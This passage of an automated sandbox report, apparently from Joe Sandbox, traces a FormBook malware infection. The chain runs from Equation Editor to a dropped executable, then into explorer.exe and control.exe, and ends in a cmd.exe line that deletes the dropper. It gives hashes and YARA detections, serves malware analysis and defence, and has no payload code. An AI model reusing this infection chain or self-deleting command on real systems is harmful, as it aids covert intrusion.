                                                                                                                                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:543304 bytes
                                                                                                                                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                Analysis Process: prosper3512.exe PID: 2580 Parent PID: 1296

                                                                                                                                                                                                General

                                                                                                                                                                                                Start time:16:21:37
                                                                                                                                                                                                Start date:10/06/2021
                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\prosper3512.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\prosper3512.exe
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:245650 bytes
                                                                                                                                                                                                MD5 hash:CB4947E5C78ADA624D22C28EE9079871
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                • Detection: 30%, ReversingLabs
                                                                                                                                                                                                Reputation:low

                                                                                                                                                                                                Analysis Process: prosper3512.exe PID: 2308 Parent PID: 2580

                                                                                                                                                                                                General

                                                                                                                                                                                                Start time:16:21:38
                                                                                                                                                                                                Start date:10/06/2021
                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\prosper3512.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\prosper3512.exe
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:245650 bytes
                                                                                                                                                                                                MD5 hash:CB4947E5C78ADA624D22C28EE9079871
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                Reputation:low

                                                                                                                                                                                                Analysis Process: explorer.exe PID: 1388 Parent PID: 2308

                                                                                                                                                                                                General

                                                                                                                                                                                                Start time:16:21:41
                                                                                                                                                                                                Start date:10/06/2021
                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:
                                                                                                                                                                                                Imagebase:0xffca0000
                                                                                                                                                                                                File size:3229696 bytes
                                                                                                                                                                                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                Analysis Process: control.exe PID: 2876 Parent PID: 2308

                                                                                                                                                                                                General

                                                                                                                                                                                                Start time:16:22:08
                                                                                                                                                                                                Start date:10/06/2021
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                Imagebase:0x540000
                                                                                                                                                                                                File size:113152 bytes
                                                                                                                                                                                                MD5 hash:9130377F87A2153FEAB900A00EA1EBFF
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                Reputation:moderate

                                                                                                                                                                                                Analysis Process: cmd.exe PID: 2964 Parent PID: 2876

                                                                                                                                                                                                General

                                                                                                                                                                                                Start time:16:22:15
                                                                                                                                                                                                Start date:10/06/2021
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:/c del 'C:\Users\user\AppData\Roaming\prosper3512.exe'
                                                                                                                                                                                                Imagebase:0x49eb0000
                                                                                                                                                                                                File size:302592 bytes
                                                                                                                                                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                Code Analysis

                                                                                                                                                                                                Reset < >